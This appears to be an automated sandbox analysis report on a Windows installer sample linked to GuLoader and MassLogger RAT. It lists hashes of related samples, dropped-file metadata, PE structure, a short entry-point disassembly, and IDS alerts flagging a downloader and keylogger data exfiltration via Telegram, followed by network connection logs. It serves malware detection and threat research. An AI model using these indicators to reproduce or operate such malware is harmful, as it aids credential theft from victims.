                                                                                  b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dllczHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):484658
                                                                                                    Entropy (8bit):7.809711763657168
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                    MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                    SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                    SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                    SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):265451
                                                                                                    Entropy (8bit):7.782402940724189
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:MfD0sueIxWjINar/W+7HQEr2h68AS/58b3Pxlo4th+1rpu+MHr+yOvAYYR36Dbs:uTyD+7wEyzizP/o6hCtMHr+D/YR3b
                                                                                                    MD5:0086A4711D718152A54D75819B459A34
                                                                                                    SHA1:E2DC6C0ABE6C7F59801B94B5BA3337597FFC8D69
                                                                                                    SHA-256:746807F1588B3611FF5B28451BDFDB07FAE73CD2F0D5502C44D7A9D0C8667C0F
                                                                                                    SHA-512:166D1A46B2A96E6B9183265CB01893EBB45CE65B35625F3EA71BC9918BCE2BBE19277231E5112E5B06A038375FA1B6F6D2E1564FBEC93269F11C57DCB7A04417
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......................!.////..=..........|..........xxx......K..II......................r........^^...........................m..................?...................nn........A.%%%..AA.....33..\\\\\...p.CCC...........................7...F...6....3333....|..........88...... ..8.............................<<...............,,....e../..0..y......~~.....................................r..-...xxx.........4..............NNNNN...HH.||.....-..........q...............................................u...ff..7..>.....VV...............`..........77........gggggggg.AA....................ooooo.M......ss.X.9..........N........KK.QQ............*...III................[[...........|................................m.........\..........,..................".mm.EE.......rr....7.............||.......OO..............//.....qq...........ll....l..l.......W............ .............]]]]]]......................DDDDDDDDD...........6.wwwww..KK.................P...................]]..```````......hhh...........a.A
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112291
                                                                                                    Entropy (8bit):1.249420131631438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                    MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                    SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                    SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                    SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):362089
                                                                                                    Entropy (8bit):1.23992084267325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                    MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                    SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                    SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                    SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139354
                                                                                                    Entropy (8bit):1.2473328695625903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                    MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                    SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                    SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                    SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                    Malicious:false
                                                                                                    Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29109
                                                                                                    Entropy (8bit):4.571452088399361
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:NAaDWUweT7xl/UzbAZX2iGjoGdjtjc0bItS4GDyIEN3+nMTrXAw2KvZ6YHx8KM/Z:NT1zMsGiGLK0bItS12lrnxHx8K0ku
                                                                                                    MD5:88F751E865173E78E89A78BAE34FD3D3
                                                                                                    SHA1:67825D4FBC5C0B462DAD04668080272D0E20D31B
                                                                                                    SHA-256:CD32E850C8641C3C2CB2AB071F82651261E4B08B26C045DE2964C2C099793866
                                                                                                    SHA-512:73445E8D885AFB4DF8D2169304035845D92DF4D0B053BBF3B9894D5E7E732AC8378EEAE215B8F0AFE22823823389091377FA0EC3895304B280A8C29589D59BAB
                                                                                                    Malicious:false
                                                                                                    Preview:.........vvvvv..SS..........................$$................66.................(...F............................88.!!!.........M.....................................ppp.'......,.j....B.........H.......................HH...._..........V......=...>........___.D.......888.m.ee.....uu......+....$..&&.....I...........ff.,......P.....22...............@@....////.uuu....V...ppppp.VV.oo.....}}}}}.EEE.d...>>>>..~~.S..................KKK.xx.......zz........Z.66......_...........V...M.....ii......#.........!!!!!!!!!.bbb....................?.)....xxx.EE......................................................s.....(((...............................U...................................www....44..........PP..........III.......YY.......BB.....................OO....................DDD....===.....}}......i........................................A......................??..................i.......EE..............Q.....R......o...bb..............|||..........................................n..N.h.........i..
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1419231
                                                                                                    Entropy (8bit):5.474882951664024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:DTyD+pL/bfcgq1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DQZ2:/yD0L/bfEo3xX3y4bz2lWwWo6rSTZy/
                                                                                                    MD5:F7D9F967CA2F71E3D562937FCB24C382
                                                                                                    SHA1:C16A775DD27444712E51E969C48B92A59BC30A42
                                                                                                    SHA-256:FC404818413612BDF92C72AB1F5EB9CC32D86D9D30D127C4D4E0114D70620B45
                                                                                                    SHA-512:9B448617B9A58A5F43B87165EE37BD36D2FEFEEA025E8173C00E33BCA4C0B0B0C66C765281FABEAC0857FEC2073940E021E4D0256144555DF784E91DF4A54073
                                                                                                    Malicious:false
                                                                                                    Preview:.6......,.......,.......\........!......:5......86..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):5.719859767584478
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                    MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                    SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                    SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                    SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: czHx16QwGQ.exe, Detection: malicious, Browse
                                                                                                    • Filename: rXKfKM0T49.exe, Detection: malicious, Browse
                                                                                                    • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                                                                    • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                                                                    • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                                                                    • Filename: V7OHj6ISEo.exe, Detection: malicious, Browse
                                                                                                    • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                                                                    • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                    • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                    Entropy (8bit):7.957075213429238
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:WGi85dsMNp.exe
                                                                                                    File size:979'348 bytes
                                                                                                    MD5:2275024102505f0997f027c71970750d
                                                                                                    SHA1:10a4feb8f216f86caa840ff85ba02c85e00e8665
                                                                                                    SHA256:5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a
                                                                                                    SHA512:1ebf7e71b121a3102d2de3c756761fe7e2efae90b2561912886da7d8a43fe9fcf29322d5f239cd21614847d9ec3c519b2d2a1213252cf3e1ee5dc622d4e24182
                                                                                                    SSDEEP:24576:9jwKCNRVJ13mzBqtejjs3RgG9vWciasTKafa0aULP:V1CLFyqtukfiaJaCUP
                                                                                                    TLSH:C725234A5772CCA7D8164871962BCCA7B6B57E0238946ED353C0AB0F3CB131B4D29F99
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                    Icon Hash:46224e4c19391d03
                                                                                                    Entrypoint:0x4034a5
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                    Instruction
                                                                                                    sub esp, 000002D4h
                                                                                                    push ebx
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000020h
                                                                                                    pop edi
                                                                                                    xor ebx, ebx
                                                                                                    push 00008001h
                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                    call dword ptr [004080ACh]
                                                                                                    call dword ptr [004080A8h]
                                                                                                    and eax, BFFFFFFFh
                                                                                                    cmp ax, 00000006h
                                                                                                    mov dword ptr [0042A24Ch], eax
                                                                                                    je 00007FED40CBD053h
                                                                                                    push ebx
                                                                                                    call 00007FED40CC031Dh
                                                                                                    cmp eax, ebx
                                                                                                    je 00007FED40CBD049h
                                                                                                    push 00000C00h
                                                                                                    call eax
                                                                                                    mov esi, 004082B0h
                                                                                                    push esi
                                                                                                    call 00007FED40CC0297h
                                                                                                    push esi
                                                                                                    call dword ptr [00408150h]
                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                    jne 00007FED40CBD02Ch
                                                                                                    push 0000000Ah
                                                                                                    call 00007FED40CC02F0h
                                                                                                    push 00000008h
                                                                                                    call 00007FED40CC02E9h
                                                                                                    push 00000006h
                                                                                                    mov dword ptr [0042A244h], eax
                                                                                                    call 00007FED40CC02DDh
                                                                                                    cmp eax, ebx
                                                                                                    je 00007FED40CBD051h
                                                                                                    push 0000001Eh
                                                                                                    call eax
                                                                                                    test eax, eax
                                                                                                    je 00007FED40CBD049h
                                                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                                                    push ebp
                                                                                                    call dword ptr [00408044h]
                                                                                                    push ebx
                                                                                                    call dword ptr [004082A0h]
                                                                                                    mov dword ptr [0042A318h], eax
                                                                                                    push ebx
                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                    push 000002B4h
                                                                                                    push eax
                                                                                                    push ebx
                                                                                                    push 004216E8h
                                                                                                    call dword ptr [00408188h]
                                                                                                    push 0040A384h
                                                                                                    Programming Language:
                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                    RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                    RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                    RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                    RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                    RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                    RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                    RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                    RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                    RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                    RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                    RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                    RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                    RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                    RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                    RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                    RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                    RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                    RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                    RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                    RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                    RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                    DLLImport
                                                                                                    KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-11T00:04:15.689028+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549705142.250.186.78443TCP
                                                                                                    2025-01-11T00:04:20.641993+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549738193.122.130.080TCP
                                                                                                    2025-01-11T00:04:27.173384+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549738193.122.130.080TCP
                                                                                                    2025-01-11T00:04:27.847490+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549784149.154.167.220443TCP
                                                                                                    2025-01-11T00:04:28.155649+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549784149.154.167.220443TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 11, 2025 00:04:14.546508074 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:14.546545029 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:14.546689034 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:14.560691118 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:14.560705900 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.226109028 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.226264954 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.227648020 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.227739096 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.394640923 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.394681931 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.395167112 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.395224094 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.399024010 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.439326048 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.689023972 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.689279079 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.689301014 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.689340115 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.689629078 CET49705443192.168.2.5142.250.186.78
